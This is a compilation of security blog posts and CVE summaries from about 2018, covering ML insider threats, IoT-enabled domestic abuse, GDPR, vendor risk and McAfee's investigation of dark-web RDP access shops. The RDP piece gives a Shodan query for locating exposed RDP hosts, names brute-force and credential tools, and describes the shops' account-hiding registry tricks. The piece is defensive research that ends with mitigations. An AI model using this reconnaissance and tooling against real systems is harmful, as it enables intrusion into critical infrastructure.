Will Machine Learning Reduce or Multiply Insider Breaches?

Though new technology likely won’t be stealing jobs, it could boost the risk of an insider breach. All companies are vulnerable to insider threats, which can take the form of deliberate actions to steal data or unintentional oversharing of corporate information. Since AI and machine learning tools lack human traits that underpin these risks, they should naturally produce a safer environment.

As noted by CSO Online in January 2018, however, malicious actors could leverage the same technologies to create unwitting insider threats by poisoning data pools. By tampering with data inputs, attackers also compromise outputs — which companies may not realize until it’s too late.

According to a May 2018 Medium report, meanwhile, there’s a subtler class of attacks on the rise: adversarial sampling. By creating fake samples that exist on the boundary of AI decision-making capabilities, cybercriminals may be able to force recurring misclassification, compromising the underlying trust of machine learning models in turn.

How to Thwart AI-Powered Insider Threats

With the adoption of intelligent tools on the rise, how can companies safeguard against more powerful insider threats?

Best practices include:

  • Creating human partnerships: These new tools work best in specific-task situations. By pairing any new learning tools with a human counterpart, companies create an additional line of defense against potential compromise.
  • Developing checks and balances: Does reported data match observations? Has it been independently verified? As more critical decision-making is handed off to AI and automation, enterprises must develop check-and-balance systems that compare outputs to reliable baseline data.
  • Deploying tools with a purpose: In many ways, the rise of intelligent technologies mirrors that of the cloud. At first an outlier, the solution quickly became a must-have to enable digital transition. There is potential for a similar more-is-better tendency here, but this overlooks the key role of AI and machine learning as a way to address specific pain points rather than simply keep up with the Joneses. Start small by finding a data-driven problem that could benefit from the implementation of intelligence technologies. Think of it like the zero-trust model for data access: It’s easier to contain potential compromise when the attack surface is inherently limited.

Machine learning and AI tools are gaining corporate support, and fortunately, they’re not likely to supplant the IT workforce. Looking forward, human aid will in fact be essential to proactively address the potential for next-generation insider threats empowered by compromised learning tools and adversarial AI.

The post Are Machine Learning and Adversarial AI the New Insider Threats? appeared first on Security Intelligence.

IoT domestic abuse: What can we do to stop it?

Some 40 years ago, the sci-fi/horror film Demon Seed told the tale of a woman slowly imprisoned by a sentient AI, which invaded the smart home system her husband had designed to manage it. The AI locked doors, windows, turned off communications, and even put a synthesised version of her onscreen at the front door to reassure visitors she was “fine.”

The reality, of course, is that she was anything but. There’s been endless works of fiction where smart technology micromanaging the home environment have gone rogue. Sadly, those works of fiction are bleeding over into reality.

In 2018, we suddenly have the real-world equivalent playing out in homes and behind closed doors. We’ll talk about the present day problems momentarily, but first let’s take a look how we got here by casting our eye back about 15 years ago.

PC spyware and password theft

For years, a subset of abusive partners with technical know-how have placed spyware on computers or mobile devices, stolen passwords, and generally kept tabs on their other half. This could often lead to violence, and as a result, many strategies for defending against this have been drawn up down the years. I effectively became involved in security due to a tech-related abuse case, and I’ve given many talks on this subject dating back to 2006 alongside representatives from NNEDV (National Network to End Domestic Violence).

Consumer spyware is a huge problem, and tech giants such as Google are funding programs designed to help abused spouses out of technological abuse scenarios.

The mobile wave and social control

After PC-based spyware became a tool of the trade for abusers, there came an upswing in “coercive control,” the act of demanding to check emails, texts, direct messages and more sent to mobile phones. Abusive partners demanding to see SMS messages has always been a thing, but taking your entire online existence and dumping it into a pocket-sized device was always going to raise the stakes for people up to no good.

Coercive control is such a serious problem that the UK has specific laws against it, with the act becoming a crime in 2015. Should you be found guilty, you can expect to find yourself looking at a maximum of five years imprisonment, or a fine, or both in the worst cases. From the description of coercive control:

Coercive or controlling behaviour does not relate to a single incident, it is a purposeful pattern of incidents that occur over time in order for one individual to exert power, control, or coercion over another.

Keep the “purposeful pattern of incidents occurring over time in order for an individual to exert power or control” description in mind as we move on to the next section about Internet of Things (IoT) abuse, because it’s relevant.

Internet of Things: total control

An Internet of Things control hub could be a complex remote cloud service powering a multitude of devices, but for most people, it’s a device that sits in the home and helps to power and control appliances and other systems, typically with some level of Internet access and the possibility of additional control via smartphone. It could just be in charge of security cameras or motion sensors, or it might be the total package: heating and cooling, lighting, windows, door locks, fire alarms, ovens, water temperature—pretty much anything you can think of.

It hasn’t taken long for abusive partners to take advantage of this newly-embedded functionality, with numerous tales of them making life miserable for their loved ones, effectively trapped in a 24/7 reworking of a sci-fi dystopian home.

Their cruelty is only limited by what they can’t hook into the overall network. Locking the spouse into their place of residence then cranking up the heat, blasting them with cold, flicking lights on and off, disabling services, recording conversations, triggering loud security alarms; the abused partner is almost entirely at their mercy.

There are all sorts of weird implications thrown up by this sort of real-world abuse of technologies and individuals. What happens if someone has an adverse reaction to severe temperature change? An epileptic fit due to rapidly flickering lights? How about someone turning off smoke alarms or emergency police response technology and then the place burns down or someone breaks in?

Someone could well be responsible for a death, but how would law enforcement figure it out, much less know where to pin the blame?

Of course, those are situations where spouses are still living together. There are also scenarios where the couple has separated, but the abuser still has access to the IoT tech,  and they proceed to mess with their lives remotely. One is a somewhat more straightforward to approach than the other, but neither are particularly great for the person on the receiving end.

A daunting challenge

Unfortunately, this is a tough nut to crack. Generally speaking, advice given to survivors of domestic abuse tends to err on the side of extreme caution, because if the abuser notices the slightest irregularity, they’ll seek retribution. With computers and more “traditional” forms of tech-based skullduggery, there are usually a few slices of wiggle room.

For example, an abused partner may have a mobile device, which is immediately out of reach from the abuser the moment they go outside—assuming they haven’t tampered with it. On desktop, Incognito mode browsing is useful, as are domestic abuse websites which offer tips and fast close buttons in case the abuser happens to be nearby.

Even then, though, there’s risk: the abuser may keep network logs or use surveillance software, and attempts to “hide” the browsing data may raise suspicions. In fact, this is one example where websites slowly moving to HTTPs is beneficial, because an abuser can’t see the website data. Even so, they may still see the URLs and then you’re back to square one.

With IoT, everything is considerably much more difficult in domestic abuse situations.

A lot of IoT tech is incredibly insecure because functionality is where it’s at; security, not so much. That’s why you see so many stories about webcams beamed across the Internet, or toys doing weird things, or the occasional Internet-connected toaster going rogue.

The main hubs powering everything in the home tend to be pretty locked down by comparison, especially if they’re a name brand like Alexa or Nest.

In these situations, the more locked down the device, the more difficult it is to suggest evasion solutions for people under threat. They can hardly jump in and start secretly tampering with the technology without notice—frankly people tend to become aware if a physical device isn’t acting how it should a lot faster than their covert piece of spyware designed to grab emails from a laptop.

All sorts of weird things can go wrong with some purchased spyware. Maybe there’s a server it needs to phone home to, but the server’s temporarily offline or has been shut down. Perhaps the Internet connection is a bit flaky, and it isn’t sending data back to base. What if the coder wasn’t good and something randomly started to fall apart? There’s so many variables involved that a lot of abusers might not know what to do about it.

However, a standard bit of off-the-shelf IoT kit is expected to function in a certain way, and when it suddenly doesn’t? The abuser is going to know about it.

Tackling the problem

Despite the challenges, there are some things we can do to at least gain a foothold against domestic attackers.

1) Keep a record: with the standard caveat that doing action X may attract attention Y, a log is a mainstay of abuse cases. Pretty much everyone who’s experienced this abuse and talks about it publicly will say the same thing: be mindful of how obvious your record is. A book may work for some, text obfuscated in code may work for others (though it could attract unwarranted interest if discovered). It may be easier to hide a book than keep them away from your laptop.

Of course, adjust to the situation at hand; if you’re not living with the abusive partner anymore, they’re probably not reading your paper journal kept in a cupboard. How about a mobile app? There are tools where you can detail information that isn’t saved on the device via programs designed to look like weather apps. If you can build up a picture of every time the heating becomes unbearable, or the lights go into overdrive, or alarms start buzzing, this is valuable data for law enforcement.

2) Correlation is a wonderful thing. Many of the most popular devices will keep detailed statistics of use. Nest, for example, “collects usage statistics of the device” (2.1, User Privacy) as referenced in this Black Hat paper [PDF]. If someone eventually goes to the police with their records, and law enforcement are able to obtain usage statistics for (say) extreme temperature fluctuations, or locked doors, or lightbulbs going berserk, then things quickly look problematic for the abuser.

This would especially be the case where device-recorded statistics match whatever you’ve written in your physical journal or saved to your secure mobile app.

3) This is a pretty new problem that’s come to light, and most of the discussions about it in tech circles are filled with tech people saying, “I had no idea this was a thing until now.” If there is a local shelter for abused spouses and you’re good with this area of tech/security/privacy, you may wish to pop in and see if there’s anything you could do to help pass on useful information. It’s likely they don’t have anyone on staff who can help with this particular case. The more we share with each other, the more we can support abused partners to overcome their situations.

4) If you’ve escaped an abusive spouse but you’ve brought tech with you, there’s no guarantee it hasn’t been utterly compromised. Did both of you have admin access to the devices? Have you changed the password(s) since moving? What kind of information is revealed in the admin console? Does it mention IP addresses used, perhaps geographical location, or maybe a new email address you used to set things up again? If you’ve been experiencing strange goings on in your home since plugging everything back in, and they resemble the type of trickery listed up above, it’s quite possible the abusive partner is still up to no good.

We’ve spotted at least one example where an org has performed an IoT scrub job. The idea of “ghosting” them, which is keeping at least one compromised device running to make the abuser think all is well is an interesting one, but potentially not without risk. If it’s at all possible, our advice is to trash all pieces of tech brought along for the ride. IoT is such a complex thing to set up, with so many moving parts, that it’s impossible to say for sure that everything has been technologically exorcised.

No quick fix

It’d be great if there was some sort of technological magic bullet that could fix this problem, but as you’ll see from digging around the “IoT scrub job” thread, a lot of security pros are only just starting to understand this type of digitized assault, as well as the best ways to go about combatting it. As with all things domestic abuse, caution is key, and we shouldn’t rush to give advice that could potentially put someone in greater danger. Frustratingly, a surprising number of the top results in search engines for help with these types of attack result in 404 error pages or websites that simply don’t exist anymore.

Clearly, we all need to up our game in technology circles and see what we can do to take this IoT-enabled horror show out of action before it spirals out of control. As IoT continues to integrate itself into people’s day-to-day existence, in ways that can’t easily be ripped out afterwards, the potential for massive harm to the most vulnerable members of society is staring us in the face. We absolutely must rise to the challenge.

The post IoT domestic abuse: What can we do to stop it? appeared first on Malwarebytes Labs.

Name That Risk: 8 Types of Third Party Risks You Should Know

There’s a lot of talk in the industry about protecting your company from third party risk, especially with the implementation of new regulations that hold organizations accountable for third party cybersecurity. While the OCC, FDIC, and the Federal Reserve all agree that vigorous due diligence and on-going third party monitoring are crucial to reducing your third party risk, it’s the wild west when it comes to agreement in practice.

Compounding this matter is the fact that the term ‘risk’ is quite broad. So broad in fact, that no two regulators categorize risk in precisely the same way. So how can organizations solve for ‘X’ risk if we have no clear definition of risk.

The key is to develop and implement a third party risk management program with processes and metrics to assess and manage risk expectations.

When starting this process, it is good to outline the categories of risk. Here are some types of risk that are good to know due to frequency of occurrence:

  • Reputational risk—Whether a third party provider deals directly with customers or offers a service that can indirectly impact customers, it’s your reputation on the line if the third party drops the ball.
  • Operational risk—When a third party provider is integrated into internal processes, such as through the use of a cloud-based, customer relationship management solution, it increases operational complexity and risk.
  • Transactional risk—From insufficient capacity that prevents transactions from being completed to security lapses that lead to unauthorized access and misuse of data, transaction risk is one of the most commonly encountered—and highly publicized— risks a financial institute faces.
  • Credit risk—While credit risk is most frequently considered in terms of a third party’s own financial condition, credit risk also stems from the use of third parties for loan origination, underwriting, or business solicitation.
  • Compliance risk—As more laws, rules, and regulations are put into place to protect consumers, the level of compliance risk also increases. Non-compliance due to lapses by a third party provider does not indemnify a financial organization against penalties.
  • Strategic risk—If a third party provider fails to meet the terms of a contract or return on investment.
  • Country risk—Whenever a financial institution engages a third-party provider based in a foreign country, it is exposed to potential economic, social and political conditions related to the provider location.
  • Legal risk—The activities of a third party provider can expose a financial institution to legal expenses and possible lawsuits.

Staying ahead of all these types of risk requires more than a scorecard. Organizations need to partner with a company that provides relevant intelligence – properly aggregated, contextualized, and correlated – to your organization. It also wouldn’t hurt to have access to an analyst who can discuss the implications and potential for multiple risks on your business.

With LookingGlass’ Third Party Risk Management solution, organizations receive a 360-degree view into your vendors’ risk profile, which establishes a baseline of risk for each of your vendors, and then offers continuous third party risk monitoring so you are prepared for any kind of third party risk.

Want to learn more about our Third Party Risk Management Solution? Contact Us.

 

The post Name That Risk: 8 Types of Third Party Risks You Should Know appeared first on LookingGlass Cyber Solutions Inc..

GDPR, two months later

May 25 was D day, the day that the countdown to GDPR, the new General Data Protection Regulation, came to an end, and the legislation became obligatory across the whole of the European Union. Although companies had two years in which to adapt, in the end, the majority of cases saw a last-minute scramble to implement the new regulation.

Many companies were noticeably nervous and apprehensive, something that is understandable if we consider that the consequences of breaching the GDPR are severe, with fines of 10 million Euros or 2% of annual turnover (Level 1), or 20 million Euros or 4% of annual turnover (Level 2).

But now that the dust has started to settle, what assessment can we make of the situation? Have companies adjusted to the new regulation? Have they solved their doubts? Has corporate cybersecurity been standardized in Europe? Have the privacy policy update emails stopped? Has this whole process finally ended? The fact is there are still things left to do, and, if we analyze the consequences of the GDPR, we can say, broadly speaking, that there have been three different situations.

Request a trial

A rise in complaints in several countries

In the weeks leading up to the deadline for the new data protection regulation, large and small companies turned to all kinds of experts in order to adapt to the legislation. Not all of them, however, have managed to properly adapt. Or that, at least, is what many consumers think.

According to The Guardian, data protection agencies in many countries have reported a sharp rise in the number of complaints for apparent breaches of the GDPR: the UK Information Commissioner’s Office and the French CNIL have both reported that the number of complaints of this type have increased considerably.  France, for example, has seen a 50% increase in complaints.

Google and Facebook under scrutiny

Many of the companies that were most concerned about the arrival of the GDRP were small and medium businesses. Though these companies handle less data, they also have less flexibility in their budgets, meaning that they have fewer resources to be able to adapt to the legislation. However, the reactions that we have seen in the two months since its application have gone in the opposite direction.

In fact, according to the non-profit organization NOYB (None of Your Business) most complaints have been against tech giants such as Google, Facebook, or Twitter. The reason? These large companies, rather than totally changing their data treatment policies and fully adapting them to European legislation, chose to launch a standard message, forcing users to accept their new privacy and cybersecurity policies; if users didn’t accept, their accounts would be blocked.

The other side: those who went too far the other way

Nevertheless, there was also a third case that got a lot of people talking: this is where we saw large companies that, despite the fact that they already complied with the new legislation, decided to send their users an email, asking their permission to receive notifications.

If a user chose not to accept these new policies, or simply didn’t click on the link in the email, the company that sent it would be forced to remove many users from their database – users whose permission, in fact, didn’t need to be asked.

This is what lawyer Samuel Parra believes: “There are companies that, after being incorrectly advised, sent this email asking their users for consent again, when in fact, these users’ data had been obtained legitimately, so new consent wasn’t needed.” Thus, “they now have a problem: they have found that 70 or 80% of users didn’t click on the link in the email, meaning that these companies have to delete their details from their database”, something that has meant that “several companies may have lost a large amount of future revenue, all because of some bad advice”.

Whatever the case, one thing that is true is that all companies that handle data belonging to users in the EU not only have to have their users’ permission, but they also have to establish certain corporate cybersecurity measures, such as protecting their communications (emails are the gateway for threats to your company), or implement an action and information protocol in case of possible cyberattacks.

If you’re worried about your company’s IT security, you’ll be interested to find out more about Panda Adaptive Defense, Panda’s advanced cybersecurity suite that not only acts automatically on the most frequent intrusions, but also has a human team of analysts who are able to prevent, detect and respond to cyberattacks.  What’s more, we’ve incorporated the module Panda Data Control to simplify the task of complying with the GDPR, helping you to have greater visibility and control of all personal data, including unstructured data, and to strengthen your security.

The post GDPR, two months later appeared first on Panda Security Mediacenter.

CVE-2017-7467

A buffer overflow flaw was found in the way minicom before version 2.7.1 handled VT100 escape sequences. A malicious terminal device could potentially use this flaw to crash minicom, or execute arbitrary code in the context of the minicom process.

CVE-2016-9604

It was discovered in the Linux kernel before 4.11-rc8 that root can gain direct access to an internal keyring, such as '.dns_resolver' in RHEL-7 or '.builtin_trusted_keys' upstream, by joining it as its session keyring. This allows root to bypass module signature verification by adding a new public key of its own devising to the keyring.

CVE-2018-8007

Apache CouchDB administrative users can configure the database server via HTTP(S). Due to insufficient validation of administrator-supplied configuration settings via the HTTP API, it is possible for a CouchDB administrator user to escalate their privileges to that of the operating system's user that CouchDB runs under, by bypassing the blacklist of configuration settings that are not allowed to be modified via the HTTP API. This privilege escalation effectively allows an existing CouchDB admin user to gain arbitrary remote code execution, bypassing already disclosed CVE-2017-12636. Mitigation: All users should upgrade to CouchDB releases 1.7.2 or 2.1.2.

CVE-2018-0500

Curl_smtp_escape_eob in lib/smtp.c in curl before 7.61.0 has a heap-based buffer overflow that might be exploitable by an attacker who can control the data that curl transmits over SMTP with certain settings (i.e., use of a nonstandard --limit-rate argument or CURLOPT_BUFFERSIZE value).

Happy National All American Pet Photo Day!

Today is National All American Pet Photo Day. How are you celebrating?

At Verisign, we did a quick search on NameStudioTM, our easy-to-use, domain name suggestion tool to see what interesting .com and .net domain names were available to register today … and here are some of our favorites!

AVAILABLE .COM AND .NET DOMAIN NAMES*

.COM

picswithpooch.com
happymeowblog.com
cutepetphoto.com
 petpiglet.com
fancypoodleposes.com
parakeetcorner.com
furrykisses.com
americanpetgallery.com
littleregalbeagle.com
reallycoolcat.com

.NET

picswithpooch.net
happymeowblog.net
cutepetphoto.net
petpiglet.net
fancypoodleposes.net
parakeetcorner.net
furrykisses.net
americanpetgallery.net
littleregalbeagle.net
reallycoolcat.net

 

What’s yours?

Tell us what great .com and .net domain names you’ve found on NameStudio here.

And check back soon to see what day we’re celebrating next. Better yet, subscribe to the Verisign blog to have the posts delivered directly to your inbox.

Happy National All American Pet Photo Day!


*Available as of July 11, 2018

The user is solely responsible for ensuring that the registration of any domain name listed herein or based on NameStudio domain search data does not violate any third-party trademarks or other intellectual property.

The post Happy National All American Pet Photo Day! appeared first on Verisign Blog.

Major International Airport’s Security System Found for Sale on Dark Web RDP Shop

The closest many of us get to the dark web is watching hackers surf it in television shows or movies. However, it is a very real place that contains lots of stolen data. This data, along with compromised systems, devices, and more are often sold in underground marketplaces that exist on the dark web. One type of marketplace is called a remote desktop protocol (RDP) shop, which provides access to stolen systems for a small fee. Found in one of these RDP shops by McAfee’s ATR team: a major international airport’s security and building automation systems, which could be purchased for only $10 USD.

You might be wondering – what does “access” mean in this scenario? Just like Spotify and Apple Music sell access to artist’s songs, or a gym sells access to their exercise machines, the dark web can sell remote access to hacked machines through these RDP shops. Once access is purchased, crooks can obtain logins to a victim’s computer system and essentially have full control of it.

Now, the McAfee ATR team is not exactly sure how the cybercriminals got their hands on these systems. But they do know that once something like an airport security system is purchased, crooks can do serious damage. This access could allow cybercriminals to do essentially anything they want – create false alerts to the internal security team, send spam, steal data and credentials, mine for cryptocurrency, or even conduct a ransomware attack on the organization.

So, what happens if your information was potentially compromised in the sale of one of these systems on the dark web? To protect your personal data from larger cybercriminal schemes that originate from RDP shops, be sure to follow these tips: 

  • Be selective about what you share. The best way to control where your information goes is by reducing the sources you share it with. That means not providing your personal information to every app, network, or system that asks for it. Be strict and diligent, and only provide something with information when it’s crucial to the service or experience it provides.
  • Set up an alert. Compromised information could potentially include financial data. Therefore, it’s best to proactively place a fraud alert on your credit so that any new or recent requests undergo scrutiny. This also entitles you to extra copies of your credit report, so you can check for anything suspicious. If you find an account you did not open, report it to the police or Federal Trade Commission, as well as the creditor involved so you can close the fraudulent account.
  • Invest in an identity theft monitoring and recovery solution. If enough personal data becomes compromised by cybercriminals accessing stolen systems, users could be potentially faced with the possibility of identity theft. That’s precisely why they should leverage a solution tool such as McAfee Identity Theft Protection, which allows users to take a proactive approach to protecting their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Major International Airport’s Security System Found for Sale on Dark Web RDP Shop appeared first on McAfee Blogs.

How the Industry 4.0 Era Will Change the Cybersecurity Landscape

Today’s highly automated and connected smart factories (Industry 4.0) were born out of yesterday’s steam engines that mechanized manufacturing (Industry 1.0); mass-production lines expanded with the advent of electricity (Industry 2.0); and then IT-enabled manufacturing plants ushered in the era of connected industrial control systems with programmable logic controllers (PLC).

While enterprises struggle to enhance their operational efficiency, customer experience, logistics, and supply chain gains through IoT use, their malicious counterparts may be expending just as much resource to undermine their efforts. We have seen attacks adversely affect an enterprise’s bottom line in the past. Cases in point include a DDoS attack on Dyn’s servers that brought down major sites, including PayPal, Spotify, Netflix, and Twitter in October 2016 and an IT failure that drove British Airways to freeze thousands of its Executive Club frequent-flier accounts in March 2017 after confirming unauthorized activity from a third party.

In December last year, TRITON/TRISIS reared its ugly head, and can be considered the latest addition to ICS attackers’ armory. ICS lie at the core of the cyber-physical systems that characterize the Industry 4.0 era. The TRITON/TRISIS attack showed that at the hands of determined threat actors, a single piece of malicious code could have physical repercussions.

In the Industry 4.0 era, enterprises not only need to worry about the usual business disrupters—natural disasters, adverse publicity, and loss of key personnel, among others—but also increasingly sophisticated cyberthreats targeting critical infrastructure and the smart devices that we use to virtually control them. Modern ICS are prone to vulnerabilities that attackers can exploit to get into target networks. Industrial robots or any connected system that remains exposed can easily be scanned for vulnerabilities that, when exploited, can lead to the production of defective goods. Insufficiently secured IoT devices, when hacked, can be used to instigate DDoS and other business-crippling attacks.

We are bound to see more of these as companies increasingly embrace the advantages that smart factories, industrial robots, and the many other components that make up IIoT-enabled environments and the Industry 4.0 era offer. Enterprises will need to mitigate risks more than ever. They will need an integrated approach to security that begins with a cybersecurity framework. Any secure smart environment should have a sound foundation that uses next-generation intrusion detection and prevention, application whitelisting, integrity monitoring, virtual patching, advance sandboxing analysis, machine learning, behavior analysis, antimalware, risk detection, vulnerability assessment, next-generation firewall, anti-spear-phishing, spam protection, and data leakage technologies. Deploying a risk-reducing architecture and staying abreast of the latest in cybersecurity (threats and possible mitigation steps) by relying on trusted partners are also a must to protect all connected devices and environments on all fronts.

Read more about mitigating risks in today’s smart environments in IIoT Security Risk Mitigation in the Industry 4.0 Era.

The post How the Industry 4.0 Era Will Change the Cybersecurity Landscape appeared first on .

Organizations Leave Backdoors Open to Cheap Remote Desktop Protocol Attacks

Thanks to my colleague Christiaan Beek for his advice and contributions.

While researching underground hacker marketplaces, the McAfee Advanced Threat Research team has discovered that access linked to security and building automation systems of a major international airport could be bought for only US$10.

The dark web contains RDP shops, online platforms selling remote desktop protocol (RDP) access to hacked machines, from which one can buy logins to computer systems to potentially cripple cities and bring down major companies.

RDP, a proprietary protocol developed by Microsoft that allows a user to access another computer through a graphical interface, is a powerful tool for systems administrators. In the wrong hands, RDP can be used to devastating effect. The recent SamSam ransomware attacks on several American institutions demonstrate how RDP access serves as an entry point. Attacking a high-value network can be as easy and cheap as going underground and making a simple purchase. Cybercriminals like the SamSam group only have to spend an initial $10 dollars to get access and are charging $40K ransom for decryption, not a bad return on investment.

A screenshot of Blackpass.bz, one of the most popular RDP-shops, largely due to the variety of services offered.

Shops explained

Security maven Brian Krebs wrote the article “Really Dumb Passwords” in 2013. That short phrase encapsulates the vulnerability of RDP systems. Attackers simply scan the Internet for systems that accept RDP connections and launch a brute-force attack with popular tools such as, Hydra, NLBrute or RDP Forcer to gain access. These tools combine password dictionaries with the vast number of credentials stolen in recent large data breaches. Five years later, RDP shops are even larger and easier to access.

The McAfee Advanced Threat Research team looked at several RDP shops, ranging in size from 15 to more than 40,000 RDP connections for sale at Ultimate Anonymity Service (UAS), a Russian business and the largest active shop we researched. We also looked at smaller shops found through forum searches and chats. During the course of our research we noticed that the size of the bigger shops varies from day to day with about 10%. The goal of our research was not to create a definitive list of RDP shops; rather, we sought a better understanding of the general modus operandi, products offered, and potential victims.

The number of compromised systems claimed to be available for sale by several RDP shops. A single compromised system can appear on more than one shop’s list.

RDP access by cybercriminals

How do cybercriminals (mis)use RDP access? RDP was designed to be an efficient way to access a network. By leveraging RDP, an attacker need not create a sophisticated phishing campaign, invest in malware obfuscation, use an exploit kit, or worry about antimalware defenses. Once attackers gain access, they are in the system. Scouring the criminal underground, we found the top uses of hacked RDP machines promoted by RDP shops.

False flags: Using RDP access to create misdirection is one of the most common applications. While preserving anonymity, an attacker can make it appear as if his illegal activity originates from the victim’s machine, effectively planting a false flag for investigators and security researchers. Attackers can plant this flag by compiling malicious code on the victim’s machine, purposely creating false debugging paths and changing compiler environment traces.

Spam: Just as spammers use giant botnets such as Necrus and Kelihos, RDP access is popular among a subset of spammers. Some of the systems we found for sale are actively promoted for mass-mailing campaigns, and almost all the shops offer a free blacklist check, to see if the systems were flagged by SpamHaus and other antispam organizations.

Account abuse, credential harvesting, and extortion: By accessing a system via RDP, attackers can obtain almost all data stored on a system. This information can be used for identity theft, account takeovers, credit card fraud, and extortion, etc.

Cryptomining: In the latest McAfee Labs Threats Report, we wrote about the increase in illegal cryptocurrency mining due to the rising market value of digital currencies. We found several criminal forums actively advertising Monero mining as a use for compromised RDP machines.

Monero mining via RDP advertised on a cybercriminal forum.

Ransomware: The large majority of ransomware is still spread by phishing emails and exploit kits. However, specialized criminal groups such as SamSam are known to use RDP to easily enter their victims’ networks almost undetected.

RDP shop overview

Systems for sale: The advertised systems ranged from Windows XP through Windows 10. Windows 2008 and 2012 Server were the most abundant systems, with around 11,000 and 6,500, respectively, for sale. Prices ranged from around US $3 for a simple configuration to $19 for a high-bandwidth system that offered access with administrator rights.

Third-party resellers: When comparing “stock” among several RDP shops, we found that the same RDP machines were sold at different shops, indicating that these shops act as resellers.

Windows Embedded Standard: Windows Embedded Standard, now called Windows IOT, is used in a wide variety of systems that require a small footprint. These systems can range from thin clients to hotel kiosk systems, announcement boards, point-of-sale (POS) systems, and even parking meters among others.

Among the thousands of RDP-access systems offered, some configurations stood out. We found hundreds of identically configured Windows Embedded Standard machines for sale at UAS Shop and BlackPass; all these machines were in the Netherlands. This configuration was equipped with a 1-GHz VIA Eden processor. An open-source search of this configuration revealed that it is most commonly used in thin clients and some POS systems. The configurations are associated with several municipalities, housing associations, and health care institutions in the Netherlands.

Thin client and POS systems are often overlooked and not commonly updated, making them an ideal backdoor target for an attacker. Although these systems have a small physical footprint, the business impact of having such a system compromised should not be underestimated. As we’ve observed from previous breaching of retailers leveraging unpatched or vulnerable POS systems, the damage extends far beyond financial only, including customer perception and long-term brand reputation.  In regard to the current affected systems we discovered, McAfee has notified the identified victims and is working to learn further detail on why and how these identical Windows systems were compromised.

Government and health care institutions: We also came across multiple government systems being sold worldwide, including those linked to the United States, and dozens of connections linked to health care institutions, from hospitals and nursing homes to suppliers of medical equipment. In a March blog post, the Advanced Threat Research team showed the possible consequences of ill-secured medical data and what can happen when an attacker gains access to medical systems. It is very troublesome to see that RDP shops offer an easy way in.

Additional products for sale

Services offered by our researched RDP shops.

In addition to selling RDP, some of these shops offer a lively trade in social security numbers, credit card data, and logins to online shops. The second-largest RDP shop we researched, BlackPass, offered the widest variety of products. The most prolific of these brokers provide one-stop access to all the tools used to commit fraud: RDP access into computers, social security numbers and other integral data to set up loans or open bank accounts.

For legal and ethical reasons, we did not purchase any of the products offered. Therefore, we cannot determine the quality of the services.

RDP ransomware attack scenario

Is it possible to find a high-value victim using an RDP shop? The Advanced Threat Research team put this theory to the test. By leveraging the vast amounts of connections offered by the RDP shops, we were able to quickly identify a victim that fits the profile of a high-value target in the United States.

We found a newly posted (on April 16) Windows Server 2008 R2 Standard machine on the UAS Shop. According to the shop details, it belonged to a city in the United States and for a mere $10 we could get administrator rights to this system.

RDP access offered for sale.

UAS Shop hides the last two octets the of the IP addresses of the systems it offers for sale and charges a small fee for the complete address. (We did not pay for any services offered by UAS or any other shop.) To locate the system being sold, we used shodan.io to search for any open RDP ports at that specific organization using this query:

org:”City  XXX” port:”3389”

The results were far more alarming than we anticipated. The Shodan search narrowed 65,536 possible IPs to just three that matched our query. By obtaining a complete IP address we could now look up the WHOIS information, which revealed that all the addresses belonged to a major International airport. This is definitely not something you want to discover on a Russian underground RDP shop, but the story gets worse.

From bad to worse

Two of the IP addresses presented a screenshot of the accessible login screens.

A login screen that matches the configuration offered in the RDP shop.

A closer look at the screenshots shows that the Windows configuration (preceding screen) is identical to the system offered in the RDP shop. There are three user accounts available on this system, one of which is the administrator account. The names of the other accounts seemed unimportant at first but after performing several open-source searches we found that the accounts were associated with two companies specializing in airport security; one in security and building automation, the other in camera surveillance and video analytics. We did not explore the full level of access of these accounts, but a compromise could offer a great foothold and lateral movement through the network using tools such as Mimikatz.

The login screen of a second system on the same network.

Looking at the other login account (preceding screen), we saw it is part of the domain with a very specific abbreviation. We performed the same kind of search on the other login account and found the domain is most likely associated with the airport’s automated transit system, the passenger transport system that connects terminals. It is troublesome that a system with such significant public impact might be openly accessible from the Internet.

Now we know that attackers, like the SamSam group, can indeed use an RDP shop to gain access to a potential high-value ransomware victim. We found that access to a system associated with a major international airport can be bought for only $10—with no zero-day exploit, elaborate phishing campaign, or watering hole attack.

Anonymization

To publish our findings, we have anonymized the data to prevent any disclosure of sensitive security information.

Basic forensic and security advice

Playing hide and seek

Besides selling countless connections, RDP shops offer tips on how to remain undetected when an attacker wants to use the freshly bought RDP access.

This screen from the UAS Shop’s FAQ section explains how to add several registry keys to hide user accounts.

The UAS Shop offers a zip file with a patch to allow multiuser RDP access, although it is not possible by default on some Windows versions. The zip file contains two .reg files that alter the Windows registry and a patch file that alters termsvrl.dll to allow concurrent remote desktop connections.

These alterations to the registry and files leave obvious traces on a system. Those indicators can be helpful when investigating misuse of RDP access.

In addition to checking for these signs, it is good practice to check the Windows event and security logs for unusual logon types and RDP use. The following screen, from the well-known SANS Digital Forensics and Incident Response poster, explains where the logs can be found.


Source: SANS DFIR Poster 2015.

Basic RDP security measures

Outside access to a network can be necessary, but it always comes with risk. We have summarized some basic RDP security measures:

  • Using complex passwords and two-factor authentication will make brute-force RDP attacks harder to succeed
  • Do not allow RDP connections over the open Internet
  • Lock out users and block or timeout IPs that have too many failed login attempts
  • Regularly check event logs for unusual login attempts
  • Consider using an account-naming convention that does not reveal organizational information
  • Enumerate all systems on the network and list how they are connected and through which protocols. This also applies for Internet of Things and POS systems.

Conclusion

Remotely accessing systems is essential for system administrators to perform their duties. Yet they must take the time to set up remote access in a way that is secure and not easily exploitable. RPD shops are stockpiling addresses of vulnerable machines and have reduced the effort of selecting victims by hackers to a simple online purchase.

Governments and organizations spend billions of dollars every year to secure the computer systems we trust. But even a state-of-the-art solution cannot provide security when the backdoor is left open or carries only a simple padlock. Just as we check the doors and windows when we leave our homes, organizations must regularly check which services are accessible from the outside and how they are secured. Protecting systems requires an integrated approach of defense in depth and proactive attitudes from every employee.

The post Organizations Leave Backdoors Open to Cheap Remote Desktop Protocol Attacks appeared first on McAfee Blogs.

Is the California Consumer Privacy Act the “American GDPR”?

The new California Consumer Privacy Act is the strictest data privacy law in the U.S., but it falls fall short of the GDPR. The recent Exactis data leak, which could surpass Equifax in the sheer number and scope of records exposed, has data privacy advocates calling for an “American GDPR.” While it is unlikely that… Read More

The post Is the California Consumer Privacy Act the “American GDPR”? appeared first on .

